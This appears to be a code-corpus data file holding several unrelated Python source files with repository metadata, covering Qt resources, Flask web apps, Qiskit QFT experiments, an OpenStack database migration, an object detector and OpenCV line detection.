\x00a\x00v\x00e\x00.\x00s\x00v\x00g\
\x00\x0b\
\x0cS)\xe7\
\x00s\
\x00u\x00c\x00c\x00e\x00s\x00s\x00.\x00s\x00v\x00g\
"
qt_resource_struct = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x15\x00\x00\x00\x02\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x01\x92\x00\x00\x00\x00\x00\x01\x00\x007\x9b\
\x00\x00\x01\x806k\x809\
\x00\x00\x00\x84\x00\x00\x00\x00\x00\x01\x00\x00\x0f{\
\x00\x00\x01\x806k\x80>\
\x00\x00\x01.\x00\x00\x00\x00\x00\x01\x00\x00+=\
\x00\x00\x01\x806k\x80>\
\x00\x00\x00\xc8\x00\x00\x00\x00\x00\x01\x00\x00\x1e\xad\
\x00\x00\x01\x806k\x80>\
\x00\x00\x01\xa6\x00\x00\x00\x00\x00\x01\x00\x00;[\
\x00\x00\x01\x806k\x809\
\x00\x00\x00\xb2\x00\x00\x00\x00\x00\x01\x00\x00\x16\x11\
\x00\x00\x01\x806k\x80=\
\x00\x00\x00\x10\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x01\x806k\x80>\
\x00\x00\x01\xc4\x00\x00\x00\x00\x00\x01\x00\x00?N\
\x00\x00\x01\x806k\x80>\
\x00\x00\x01L\x00\x00\x00\x00\x00\x01\x00\x00/\x05\
\x00\x00\x01\x806k\x80>\
\x00\x00\x00\xdc\x00\x00\x00\x00\x00\x01\x00\x00!\xad\
\x00\x00\x01\x80\x94\xc9\xa3y\
\x00\x00\x00R\x00\x00\x00\x00\x00\x01\x00\x00\x08\x84\
\x00\x00\x01\x806k\x80:\
\x00\x00\x00l\x00\x00\x00\x00\x00\x01\x00\x00\x0b\xac\
\x00\x00\x01\x80\x94\xceT\xed\
\x00\x00\x01\xda\x00\x00\x00\x00\x00\x01\x00\x00B\x9a\
\x00\x00\x01\x806k\x80>\
\x00\x00\x00:\x00\x00\x00\x00\x00\x01\x00\x00\x05\xf3\
\x00\x00\x01\x806k\x809\
\x00\x00\x00\x9e\x00\x00\x00\x00\x00\x01\x00\x00\x13F\
\x00\x00\x01\x806k\x809\
\x00\x00\x01h\x00\x00\x00\x00\x00\x01\x00\x002y\
\x00\x00\x01\x806k\x80>\
\x00\x00\x00&\x00\x00\x00\x00\x00\x01\x00\x00\x02\xdc\
\x00\x00\x01\x806k\x809\
\x00\x00\x01\x0e\x00\x00\x00\x00\x00\x01\x00\x00(\xdd\
\x00\x00\x01\x806k\x80=\
\x00\x00\x00\xf4\x00\x00\x00\x00\x00\x01\x00\x00$Q\
\x00\x00\x01\x806k\x809\
\x00\x00\x01|\x00\x00\x00\x00\x00\x01\x00\x005\x0a\
\x00\x00\x01\x806k\x80>\
\x00\x00\x01\xf0\x00\x00\x00\x00\x00\x01\x00\x00Fo\
\x00\x00\x01\x806k\x80>\
"
def qInitResources():
QtCore.qRegisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
| 21.801605 | 96 | 0.636434 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 29,534 | 0.98809 |
446b3bdff2cf45475da4bdea7030cc7a2b669e73 | 1,405 | py | Python | procyclist/config.py | Arham-Aalam/procyclist_performance | 494f86fb76472d9642ff4a283bdc91cba4770edc | [
"MIT"
] | 11 | 2018-09-03T10:38:14.000Z | 2021-04-21T23:51:32.000Z | procyclist/config.py | Arham-Aalam/procyclist_performance | 494f86fb76472d9642ff4a283bdc91cba4770edc | [
"MIT"
] | 10 | 2018-11-28T20:35:54.000Z | 2021-05-24T09:01:18.000Z | procyclist/config.py | Arham-Aalam/procyclist_performance | 494f86fb76472d9642ff4a283bdc91cba4770edc | [
"MIT"
] | 6 | 2018-11-13T12:12:31.000Z | 2022-01-06T19:13:01.000Z | import abc
import numpy as np
import tensorflow as tf
class Config(metaclass=abc.ABCMeta):
_attributes = [
'batch_size',
'dropout',
'input_dim',
'inputs',
'learning_rate',
'max_time',
'n_epochs',
'n_hidden',
'n_layers',
'output_dim',
'outputs',
]
@classmethod
@abc.abstractmethod
def load(cls, infile):
return np.load(infile)
def save(self, outfile):
archive = dict((attr, getattr(self, attr)) for attr in self._attributes)
return np.savez_compressed(outfile, **archive)
class DefaultConfig(Config):
# Training parameters
batch_size = 500
learning_rate = 0.01
max_time = 5000
n_epochs = 2000
# Model parameters
dropout = 0.7
n_hidden = 100
n_layers = 2
def __init__(self, inputs, outputs):
self.inputs = inputs
self.outputs = outputs
self.input_dim = len(inputs)
self.output_dim = len(outputs)
# Initialize optimizer
optimizer = tf.train.AdamOptimizer
self.optimizer = optimizer(learning_rate=self.learning_rate)
@classmethod
def load(cls, infile):
archive = super(cls).load(infile)
self = cls(archive['inputs'], archive['outputs'])
for attr in self._attributes:
setattr(self, attr, archive[attr])
return self
| 23.032787 | 80 | 0.600712 | 1,344 | 0.956584 | 0 | 0 | 338 | 0.240569 | 0 | 0 | 194 | 0.138078 |
446bc24aa0d51aebb62f5751f6f5954d3e059d78 | 1,223 | py | Python | main.py | madhavan-raja/universal-reddit-reader | fb0286eba0465f969c62d96982631fccaf0a94bb | [
"MIT"
] | null | null | null | main.py | madhavan-raja/universal-reddit-reader | fb0286eba0465f969c62d96982631fccaf0a94bb | [
"MIT"
] | null | null | null | main.py | madhavan-raja/universal-reddit-reader | fb0286eba0465f969c62d96982631fccaf0a94bb | [
"MIT"
] | null | null | null | from flask import Flask, render_template, request, url_for
import praw
import json
import random
import markdown2
creds = json.load(open("credentials.json"))
subs = [
'nosleep',
'ProRevenge',
'NuclearRevenge'
]
LIMIT = 100
app = Flask(__name__)
@app.route('/')
def home():
return render_template('index.html', subs=subs)
@app.route('/<sub_name>')
def display_post(sub_name):
reddit = praw.Reddit(client_id=creds['client_id'], client_secret=creds['client_secret'], username=creds['username'], password=creds['password'], user_agent=creds['user_agent'])
try:
sub = reddit.subreddit(sub_name)
sub_hot = sub.hot(limit=LIMIT)
random_post = random.choice(list(sub_hot))
except:
return render_template('error.html')
body_text = random_post.selftext
body = markdown2.markdown(random_post.selftext)
return render_template("display_post.html", sub=random_post.subreddit.display_name, author=random_post.author.name, title=random_post.title, url=random_post.url, upvote_ratio=int(random_post.upvote_ratio * 100), body=body, body_text=body_text)
if __name__ == '__main__':
app.run(host='0.0.0.0', debug=True) | 29.829268 | 248 | 0.69583 | 0 | 0 | 0 | 0 | 866 | 0.708095 | 0 | 0 | 191 | 0.156173 |
446c2ae8c6bf8f99edbaa2c4f1abc4a583ee51c3 | 8,259 | py | Python | app.py | snoop2head/indigo | 9468491cfc18d39ff5994bb4ee2d0d891067867d | [
"MIT"
] | 1 | 2019-08-24T14:13:20.000Z | 2019-08-24T14:13:20.000Z | app.py | snoop2head/Open_Race_of_Development_Indie_Band | 9468491cfc18d39ff5994bb4ee2d0d891067867d | [
"MIT"
] | 2 | 2021-04-30T21:00:26.000Z | 2021-06-02T00:59:08.000Z | app.py | snoop2head/Open_Race_of_Development_Indie_Band | 9468491cfc18d39ff5994bb4ee2d0d891067867d | [
"MIT"
] | null | null | null | from flask import Flask, request, jsonify
from db_user_interactions import user_respond
from pymongo import MongoClient
from datetime import date, datetime, timedelta
import re
#today's date
today_int = date.today()
print("test_app - Today's date:", today_int)
today_str = str(today_int)
#mongodb setup
client = MongoClient('your_api_server_ip',27017)
db = client.ukov_dev
# app is Flask
app = Flask(__name__)
'''
data_list = db.archive.find({'artist_name':'새소년'})
for data in data_list:
print(data)
'''
@app.route('/', methods=['POST'])
def receive_message():
# data received from KakaoTalk
dataReceive = request.get_json()
print(dataReceive)
user_key = dataReceive["userRequest"]["user"]["id"]
print(user_key)
# json format is 'userRequest' -> 'utterance'
if dataReceive["userRequest"]["utterance"]:
# received name
# name = dataReceive["userRequest"]["utterance"]
# user request refining artist
# db.same_name.find_one('name')
# registered name
artist_name = dataReceive["action"]["params"]["가수"]
print("processing name is "+ artist_name)
# need to extract the text getting rid of \n and ]r
if re.search("(\\r|)\\n$", artist_name):
artist_name= re.sub("(\\r|)\\n$", "", artist_name)
data_list = db.archive.find({'artist_name':artist_name})
print("app.py - data list from archive is:" + str(data_list))
item_list =[]
# find all data from archive collection
# if there is ticket information on archive
# getting user key and registering on db
user_respond(artist_name, today_str, user_key)
for data in data_list:
duration = "기간: " + data['start_date'] + " ~ " + data['end_date']
item = \
{
"title":data['title'],
"description":duration,
"thumbnail":
{
"imageUrl":data['poster_png']},
"social": {"like":"","comment":"","share":""},
"buttons":
[{"action":"webLink","label":"예매하기",
"webLinkUrl":data['url']},
{"action":"share","label":"공유하기"}]
}
item_list.append(item)
if not item_list:
dataSend = {
"version": "2.0",
"template": {
"outputs": [
{
"simpleText": {
"text": "ㅠㅠ "+artist_name+"의 공연이 안 잡혔나봐요 ㅠㅠ"
}
}
]
}}
return jsonify(dataSend)
else:
# changed "Carousel" into "carousel"
dataSend = \
{"version":"2.0",
"template":
{"outputs":
[{"carousel":
{"type":"basicCard","items": item_list}}]}}
print(dataSend)
return jsonify(dataSend)
@app.route('/calendar', methods = ['POST'])
def receive_for_calendar():
# data received from KakaoTalk
dataReceive = request.get_json()
print(dataReceive)
user_key = dataReceive["userRequest"]["user"]["id"]
print(user_key)
# json format is 'userRequest' -> 'utterance'
if dataReceive["userRequest"]["utterance"]:
# received name
# name = dataReceive["userRequest"]["utterance"]
# user request refining artist
# db.same_name.find_one('name')
# registered name
artist_name = dataReceive["action"]["params"]["가수"]
print("processing name is "+ artist_name)
# need to extract the text getting rid of \n and ]r
if re.search("(\\r|)\\n$", artist_name):
artist_name= re.sub("(\\r|)\\n$", "", artist_name)
public_url_data = db.calendar.find_one({'artist_name':artist_name})
if not public_url_data:
dataSend = {
"version": "2.0",
"template": {
"outputs": [
{
"simpleText": {
"text": "ㅠㅠ "+artist_name+"의 공연이 안 잡혔나봐요 ㅠㅠ"
}
}
]
}}
return jsonify(dataSend)
else:
public_url = public_url_data['public_url']
print(public_url)
dataSend = \
{"version":"2.0",
"template":
{
"outputs":
[
{
"basicCard":
{
"title":"",
"description":"공연일정을 달력으로 보시겠습니까?",
"thumbnail":{},
"social":
{
"like":"",
"comment":"",
"share":"",
},
"buttons":
[
{"action":"webLink",
"label":"달력으로 보기",
"webLinkUrl":public_url,
}
],
},
}
],
},
}
print(dataSend)
return jsonify(dataSend)
if __name__ == "__main__":
app.run(host="0.0.0.0", port=3000, debug=True)
'''
# sample from Kakao instruction
# https://i.kakao.com/docs/skill-response-format#bot
dataSend = {
"version": "2.0",
"template": {
"outputs": [
{
"carousel": {
"type": "basicCard",
"items": [
{
"title": "보물상자",
"description": "보물상자 안에는 뭐가 있을까",
"thumbnail": {
"imageUrl": "http://k.kakaocdn.net/dn/83BvP/bl20duRC1Q1/lj3JUcmrzC53YIjNDkqbWK/i_6piz1p.jpg"
},
"buttons": [
{
"action": "message",
"label": "열어보기",
"messageText": "짜잔! 우리가 찾던 보물입니다"
},
{
"action": "webLink",
"label": "구경하기",
"webLinkUrl": "https://e.kakao.com/t/hello-ryan"
}
]
},
{
"title": "보물상자2",
"description": "보물상자2 안에는 뭐가 있을까",
"thumbnail": {
"imageUrl": "http://k.kakaocdn.net/dn/83BvP/bl20duRC1Q1/lj3JUcmrzC53YIjNDkqbWK/i_6piz1p.jpg"
},
"buttons": [
{
"action": "message",
"label": "열어보기",
"messageText": "짜잔! 우리가 찾던 보물입니다"
},
{
"action": "webLink",
"label": "구경하기",
"webLinkUrl": "https://e.kakao.com/t/hello-ryan"
}
]
},
{
"title": "보물상자3",
"description": "보물상자3 안에는 뭐가 있을까",
"thumbnail": {
"imageUrl": "http://k.kakaocdn.net/dn/83BvP/bl20duRC1Q1/lj3JUcmrzC53YIjNDkqbWK/i_6piz1p.jpg"
},
"buttons": [
{
"action": "message",
"label": "열어보기",
"messageText": "짜잔! 우리가 찾던 보물입니다"
},
{
"action": "webLink",
"label": "구경하기",
"webLinkUrl": "https://e.kakao.com/t/hello-ryan"
}
]
}
]
}
}
]
}
}
'''
| 32.644269 | 116 | 0.403197 | 0 | 0 | 0 | 0 | 4,987 | 0.579412 | 0 | 0 | 4,985 | 0.57918 |
446f83409f2113d5e1b2ac5413dde30c7a47c64e | 3,270 | py | Python | sc_qiskitFilter.py | stroblme/hqsp-stqft | c2f8f8964648578755d3938bf8658e4c834548e8 | [
"MIT"
] | null | null | null | sc_qiskitFilter.py | stroblme/hqsp-stqft | c2f8f8964648578755d3938bf8658e4c834548e8 | [
"MIT"
] | null | null | null | sc_qiskitFilter.py | stroblme/hqsp-stqft | c2f8f8964648578755d3938bf8658e4c834548e8 | [
"MIT"
] | null | null | null | from qft import get_fft_from_counts, loadBackend, qft_framework
from fft import fft_framework
from frontend import frontend, signal, transform
from qiskit.circuit.library import QFT as qiskit_qft
# --- Standard imports
# Importing standard Qiskit libraries and configuring account
from qiskit import QuantumCircuit, execute, Aer, IBMQ
from qiskit.compiler import transpile, assemble
from qiskit.tools.jupyter import *
from qiskit.visualization import *
# Loading your IBM Q account(s)
provider = IBMQ.load_account()
# --- Imports
from qiskit import QuantumCircuit, execute, BasicAer
from qiskit.tools.monitor import job_monitor
import math
from numpy import linalg as LA
import numpy as np
#%config jupy = 'svg' # Makes the images look nice
# --- Computation of the calibration matrix
from qiskit.ignis.mitigation.measurement import (complete_meas_cal,CompleteMeasFitter)
from qiskit import *
nQubits = 4
nShots = 2048
qr = QuantumRegister(nQubits)
meas_calibs, state_labels = complete_meas_cal(qr=qr, circlabel='mcal')
_, backend = loadBackend('ibmq_quito', True)
job = execute(meas_calibs, backend=backend, shots=1000)
# job_monitor(job, interval = 3)
cal_results = job.result()
meas_fitter = CompleteMeasFitter(cal_results, state_labels, circlabel='mcal')
print(meas_fitter.cal_matrix)
q = QuantumRegister(4,'q')
qc = QuantumCircuit(q)
# Normalize ampl, which is required for squared sum of amps=1
ys = signal(samplingRate=1000, amplification=1, duration=0, nSamples=2**nQubits)
ys.addFrequency(125)
ys.addFrequency(250)
y = ys.sample()
plotData = ys.show(subplot=[1,4,1], title='signal')
print("Processing FFT")
fft = transform(fft_framework)
y_hat, f = fft.forward(ys)
y_hat_ideal_p, f_p = fft.postProcess(y_hat, f)
plotData = fft.show(y_hat_ideal_p, f_p, subplot=[1,4,2], title="FFT (ref)")
# y.addFrequency(250)
ampls = y / np.linalg.norm(y)
# for 2^n amplitudes, we have n qubits for initialization
# this means that the binary representation happens exactly here
qc.initialize(ampls, [q[i] for i in range(nQubits)])
qc += qiskit_qft(num_qubits=nQubits, approximation_degree=0, do_swaps=True, inverse=False, insert_barriers=False, name='qft')
qc.measure_all()
qc = transpile(qc, backend, optimization_level=1) # opt level 0,1..3. 3: heaviest opt
job = execute(qc, backend, shots = nShots)
#job = execute(qc, BasicAer.get_backend('qasm_simulator'), shots = shots)
result = job.result()
# print(result.get_counts())
genTransform = transform(None)
y_hat = np.array(get_fft_from_counts(result.get_counts(), nQubits))
f = genTransform.calcFreqArray(ys, y_hat)
y_hat_sim_p, f_p = genTransform.postProcess(y_hat, f)
plotData = genTransform.show(y_hat_sim_p, f_p, subplot=[1,4,3], title=f"qft_sim_n")
print(y_hat)
# Get the filter object
meas_filter = meas_fitter.filter
# Results with mitigation
mitigated_results = meas_filter.apply(result)
mitigated_counts = mitigated_results.get_counts(0)
# print(mitigated_counts)
y_hat = np.array(get_fft_from_counts(mitigated_counts, nQubits))
f = genTransform.calcFreqArray(ys, y_hat)
y_hat_sim_p, f_p = genTransform.postProcess(y_hat, f)
plotData = genTransform.show(y_hat_sim_p, f_p, subplot=[1,4,4], title=f"qft_sim_n_f")
print(y_hat)
frontend.primeTime() | 23.357143 | 125 | 0.76422 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 757 | 0.231498 |
4471012b0e0606129edb11e34f8104b453eec981 | 2,551 | py | Python | resources/Presentation.py | radovankavicky/conference_scheduler | 6fbb38f95051199210796d345a8781c63aff959e | [
"Apache-2.0"
] | 3 | 2018-04-02T06:45:19.000Z | 2021-06-28T13:54:29.000Z | resources/Presentation.py | Suvink/conference_scheduler | 6fbb38f95051199210796d345a8781c63aff959e | [
"Apache-2.0"
] | null | null | null | resources/Presentation.py | Suvink/conference_scheduler | 6fbb38f95051199210796d345a8781c63aff959e | [
"Apache-2.0"
] | 1 | 2018-09-01T15:43:07.000Z | 2018-09-01T15:43:07.000Z | import json
import datetime as datetime
from typing import List, Set
# optional norlize talk types
types = {
'h_180': 'help desk',
'h': 'help desk', # 2015
'r_180': 'training',
't': 'training', # 2015
't_30': 'talk 30 Min',
't_45': 'talk 45 Min',
't_60': 'talk 60 Min',
's': 'talk 30+45 Min', # 2015
'i_60': 'interactive',
'p_180': 'poster',
'p': 'poster'}
talk_schedule_types = ['t_30', 't_45', 't_60',
'i_60',
'n_60', 'n_90',
'r_180']
class Presentation:
def __init__(self,
speaker_ids: List[int],
presentation_id: int,
title: str,
interest: int,
tags: Set[str],
category: Set[str],
duration: int,
frozen: bool=False,
track: str=None,
session_type: str=None,
admin_type: str=None,
level: str=None,
):
self.speaker_id = speaker_ids
self.presentation_id = presentation_id
self.title = title
self.interest = interest
self.tags = tags
self.category = category
self.track = track # pydata etc
self.duration = duration
self.frozen = frozen
self.session_type = session_type
self.admin_type = admin_type
self.level = level
self._starts_at = None
self._ends_at = None
self.idx = 0
def __gt__(self, other):
return self.title > other
def __lt__(self, other):
return self.title < other
def __eq__(self, other):
return self.title == other
def __iter__(self):
return self
def __next__(self):
if self.idx:
self.idx = 0
raise StopIteration
self.idx += 1
return self.presentation_id, self.title
def __repr__(self):
return "{}: {} [{}][{}]".format(self.presentation_id, self.title, self.duration, ', '.join(list(self.track)))
@property
def starts_at(self):
return self._starts_at
@property
def ends_at(self):
return self._ends_at
@starts_at.setter
def starts_at(self, starts_at: datetime.datetime):
if self.frozen:
raise AssertionError("This presentation is frozen, unfreeze to set a new start time")
self._starts_at = starts_at
self._ends_at = starts_at + datetime.timedelta(minutes=self.duration)
| 26.572917 | 117 | 0.540572 | 1,995 | 0.782046 | 0 | 0 | 434 | 0.170129 | 0 | 0 | 369 | 0.144649 |
447112b6fa86b5ec0c006f66a69b184bd85f3270 | 267 | py | Python | recursion/base_converter.py | Yasir323/Data-Structures-and-Algorithms-in-Python | b721d0ca0218b9665d4f6ca0bbfd4417244bcdf0 | [
"MIT"
] | null | null | null | recursion/base_converter.py | Yasir323/Data-Structures-and-Algorithms-in-Python | b721d0ca0218b9665d4f6ca0bbfd4417244bcdf0 | [
"MIT"
] | null | null | null | recursion/base_converter.py | Yasir323/Data-Structures-and-Algorithms-in-Python | b721d0ca0218b9665d4f6ca0bbfd4417244bcdf0 | [
"MIT"
] | null | null | null | def decimal2base(num, base):
convert_string = "0123456789ABCDEF"
if num < base:
return convert_string[num]
remainder = num % base
num = num // base
return decimal2base(num, base) + convert_string[remainder]
print(decimal2base(1453, 16))
| 24.272727 | 62 | 0.677903 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 18 | 0.067416 |
4473079529dd5e75b3a6bb336fc7b57ed2937e16 | 3,894 | py | Python | nova/db/sqlalchemy/migrate_repo/versions/115_make_user_quotas_key_and_value.py | dreamhost/nova | 066a3d4c410056689b5843d9520f43b2b6e7d127 | [
"Apache-2.0"
] | 1 | 2019-11-06T12:21:59.000Z | 2019-11-06T12:21:59.000Z | nova/db/sqlalchemy/migrate_repo/versions/115_make_user_quotas_key_and_value.py | dreamhost/nova | 066a3d4c410056689b5843d9520f43b2b6e7d127 | [
"Apache-2.0"
] | null | null | null | nova/db/sqlalchemy/migrate_repo/versions/115_make_user_quotas_key_and_value.py | dreamhost/nova | 066a3d4c410056689b5843d9520f43b2b6e7d127 | [
"Apache-2.0"
] | 2 | 2019-12-23T18:06:28.000Z | 2020-07-24T08:44:28.000Z | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.openstack.common import log as logging
from sqlalchemy import Boolean, Column, DateTime, Integer
from sqlalchemy import MetaData, String, Table
LOG = logging.getLogger(__name__)
def upgrade(migrate_engine):
# Upgrade operations go here. Don't create your own engine;
# bind migrate_engine to your metadata
meta = MetaData()
meta.bind = migrate_engine
# Add 'user_id' column to quota_usages table.
quota_usages = Table('quota_usages', meta, autoload=True)
user_id = Column('user_id',
String(length=255, convert_unicode=False,
assert_unicode=None, unicode_error=None,
_warn_on_bytestring=False))
quota_usages.create_column(user_id)
# Add 'user_id' column to reservations table.
reservations = Table('reservations', meta, autoload=True)
user_id = Column('user_id',
String(length=255, convert_unicode=False,
assert_unicode=None, unicode_error=None,
_warn_on_bytestring=False))
reservations.create_column(user_id)
# New table.
user_quotas = Table('user_quotas', meta,
Column('id', Integer(), primary_key=True),
Column('created_at', DateTime(timezone=False)),
Column('updated_at', DateTime(timezone=False)),
Column('deleted_at', DateTime(timezone=False)),
Column('deleted', Boolean(), default=False),
Column('user_id',
String(length=255, convert_unicode=False,
assert_unicode=None, unicode_error=None,
_warn_on_bytestring=False)),
Column('project_id',
String(length=255, convert_unicode=False,
assert_unicode=None, unicode_error=None,
_warn_on_bytestring=False)),
Column('resource',
String(length=255, convert_unicode=False,
assert_unicode=None, unicode_error=None,
_warn_on_bytestring=False),
nullable=False),
Column('hard_limit', Integer(), nullable=True),
mysql_engine='InnoDB',
mysql_charset='utf8',
)
try:
user_quotas.create()
except Exception:
LOG.error(_("Table |%s| not created!"), repr(user_quotas))
raise
def downgrade(migrate_engine):
# Operations to reverse the above upgrade go here.
meta = MetaData()
meta.bind = migrate_engine
quota_usages = Table('quota_usages', meta, autoload=True)
quota_usages.drop_column('user_id')
reservations = Table('reservations', meta, autoload=True)
reservations.drop_column('user_id')
user_quotas = Table('user_quotas', meta, autoload=True)
try:
user_quotas.drop()
except Exception:
LOG.error(_("user_quotas table not dropped"))
raise
| 40.989474 | 78 | 0.586543 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,165 | 0.299178 |
4473dea74ad824b410db2d46eaf6858a8677dd85 | 857 | py | Python | src/bin_print.py | wykys/MIKS-FSK | a28255a1a184fb0b9753fcb133ea12e1b75ae93d | [
"MIT"
] | null | null | null | src/bin_print.py | wykys/MIKS-FSK | a28255a1a184fb0b9753fcb133ea12e1b75ae93d | [
"MIT"
] | null | null | null | src/bin_print.py | wykys/MIKS-FSK | a28255a1a184fb0b9753fcb133ea12e1b75ae93d | [
"MIT"
] | null | null | null | # wykys 2019
def bin_print(byte_array: list, num_in_line: int = 8, space: str = ' | '):
def bin_to_str(byte_array: list) -> str:
return ''.join([
chr(c) if c > 32 and c < 127 else '.' for c in byte_array
])
tmp = ''
for i, byte in enumerate(byte_array):
tmp = ''.join([tmp, f'{byte:02X}'])
if (i+1) % num_in_line:
tmp = ''.join([tmp, ' '])
else:
tmp = ''.join([
tmp,
space,
bin_to_str(byte_array[i-num_in_line+1:i+1]),
'\n'
])
if (i+1) % num_in_line:
tmp = ''.join([
tmp,
' '*(3*(num_in_line - ((i+1) % num_in_line)) - 1),
space,
bin_to_str(byte_array[i - ((i+1) % num_in_line) + 1:]),
'\n'
])
print(tmp)
| 26.78125 | 74 | 0.424737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 59 | 0.068845 |
44753690a6f52033d694b5d7fcc31dbb08db5c3c | 1,527 | py | Python | mmrotate/models/detectors/oriented_rcnn.py | liuyanyi/mmrotate | d80310aa2c4a67c877c62432cddee246d2a4dbcd | [
"Apache-2.0"
] | 449 | 2022-02-18T08:26:58.000Z | 2022-03-31T11:58:32.000Z | mmrotate/models/detectors/oriented_rcnn.py | liuyanyi/mmrotate | d80310aa2c4a67c877c62432cddee246d2a4dbcd | [
"Apache-2.0"
] | 162 | 2022-02-18T09:54:46.000Z | 2022-03-31T15:40:46.000Z | mmrotate/models/detectors/oriented_rcnn.py | liuyanyi/mmrotate | d80310aa2c4a67c877c62432cddee246d2a4dbcd | [
"Apache-2.0"
] | 98 | 2022-02-18T08:28:48.000Z | 2022-03-31T08:52:11.000Z | # Copyright (c) OpenMMLab. All rights reserved.
import torch
from ..builder import ROTATED_DETECTORS
from .two_stage import RotatedTwoStageDetector
@ROTATED_DETECTORS.register_module()
class OrientedRCNN(RotatedTwoStageDetector):
"""Implementation of `Oriented R-CNN for Object Detection.`__
__ https://openaccess.thecvf.com/content/ICCV2021/papers/Xie_Oriented_R-CNN_for_Object_Detection_ICCV_2021_paper.pdf # noqa: E501, E261.
"""
def __init__(self,
backbone,
rpn_head,
roi_head,
train_cfg,
test_cfg,
neck=None,
pretrained=None,
init_cfg=None):
super(OrientedRCNN, self).__init__(
backbone=backbone,
neck=neck,
rpn_head=rpn_head,
roi_head=roi_head,
train_cfg=train_cfg,
test_cfg=test_cfg,
pretrained=pretrained,
init_cfg=init_cfg)
def forward_dummy(self, img):
"""Used for computing network flops.
See `mmrotate/tools/analysis_tools/get_flops.py`
"""
outs = ()
# backbone
x = self.extract_feat(img)
# rpn
if self.with_rpn:
rpn_outs = self.rpn_head(x)
outs = outs + (rpn_outs, )
proposals = torch.randn(1000, 6).to(img.device)
# roi_head
roi_outs = self.roi_head.forward_dummy(x, proposals)
outs = outs + (roi_outs, )
return outs
| 29.941176 | 141 | 0.585462 | 1,338 | 0.876228 | 0 | 0 | 1,375 | 0.900458 | 0 | 0 | 390 | 0.255403 |
44755cd5a2c76db41cda5c1690ebfe260273ba7d | 3,008 | py | Python | beam.py | alexzhou007/VIF | ce2a97eb0cb6f056c570adb2b32c69adb1ae3c22 | [
"MIT"
] | 3 | 2018-11-08T17:45:20.000Z | 2019-08-05T14:38:32.000Z | beam.py | alexzhou007/VIF | ce2a97eb0cb6f056c570adb2b32c69adb1ae3c22 | [
"MIT"
] | null | null | null | beam.py | alexzhou007/VIF | ce2a97eb0cb6f056c570adb2b32c69adb1ae3c22 | [
"MIT"
] | 1 | 2018-11-05T13:01:30.000Z | 2018-11-05T13:01:30.000Z | import numpy as np
import cv2
import wall
SAME_LINE_THRESHOLD = 100
SAME_LEVEL_THRESHOLD = 8
SHORT_LINE_LENGTH = 10
BLEED_THRESHOLD = 10
def similar_line_already_found(line, found_lines):
for fline in found_lines:
x1, y1, x2, y2 = line
fx1, fy1, fx2, fy2 = fline
is_vertical_with_range = abs(x1 - x2) < SAME_LEVEL_THRESHOLD
is_horizental_with_range = abs(y1 - y2) < SAME_LEVEL_THRESHOLD
# Drop if short line.
if ((is_horizental_with_range and abs(x1 - x2) < SHORT_LINE_LENGTH) or
(is_vertical_with_range and abs(y1 - y2) < SHORT_LINE_LENGTH)):
return True
xdiff = abs(x1 - fx1) + abs(x2 - fx2)
ydiff = abs(y1 - fy1) + abs(y2 - fy2)
diff = xdiff + ydiff
if diff <= SAME_LINE_THRESHOLD:
if is_horizental_with_range:
avg_y = int((y1 + y2 + fy1 + fy2) / 4)
fline[1] = fline[3] = avg_y
elif is_vertical_with_range:
avg_x = int((x1 + x2 + fx1 + fx2) / 4)
fline[0] = fline[2] = avg_x
return True
if is_horizental_with_range and (
(x1 > fx1 - BLEED_THRESHOLD and x2 < fx2 + BLEED_THRESHOLD) or
(x1 > fx2 - BLEED_THRESHOLD and x2 < fx1 + BLEED_THRESHOLD)
) and abs(ydiff < SAME_LINE_THRESHOLD/2):
avg_y = int((y1 + y2 + fy1 + fy2) / 4)
fline[1] = fline[3] = avg_y
return True
elif is_vertical_with_range and (
(y1 > fy1 - BLEED_THRESHOLD and y2 < fy2 + BLEED_THRESHOLD) or
(y1 > fy2 - BLEED_THRESHOLD and y2 < fy1 + BLEED_THRESHOLD)
) and abs(xdiff < SAME_LINE_THRESHOLD/2):
avg_x = int((x1 + x2 + fx1 + fx2) / 4)
fline[0] = fline[2] = avg_x
return True
return False
def normalize_lines(lines):
norm_dict = {}
normalized_lines = []
for line in lines:
existing_line = similar_line_already_found(line[0].tolist(), normalized_lines)
if not existing_line:
normalized_lines.append(line[0].tolist())
return normalized_lines
def find_steel_beams(img, debug=False):
image = wall.remove_walls(img)
if debug:
cv2.imshow("Walls/Columns Removed", image)
cv2.waitKey(0)
thresh = 50
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
im_bw = cv2.threshold(gray, thresh, 255, cv2.THRESH_BINARY)[1]
if debug:
cv2.imshow("Black And White", im_bw)
cv2.waitKey(0)
kernel = np.ones((2,2),np.uint8)
erosion = cv2.erode(im_bw, kernel, iterations=3)
if debug:
cv2.imshow("Erode", erosion)
cv2.waitKey(0)
dilation = cv2.dilate(erosion, kernel, iterations=3)
if debug:
cv2.imshow("Dilate", dilation)
cv2.waitKey(0)
minLineLength = 100
maxLineGap = 0
lines = cv2.HoughLinesP(dilation, rho=0.02, theta=np.pi/500, threshold=10, minLineLength=minLineLength, maxLineGap=maxLineGap)
print("Found %d lines" % len(lines))
lines = normalize_lines(lines)
print("Normalized to %d lines" % len(lines))
for line in lines:
x1, y1, x2, y2 = line
cv2.line(img,(x1,y1),(x2,y2),(0,255,0),2)
if debug:
cv2.imshow("Beam", img)
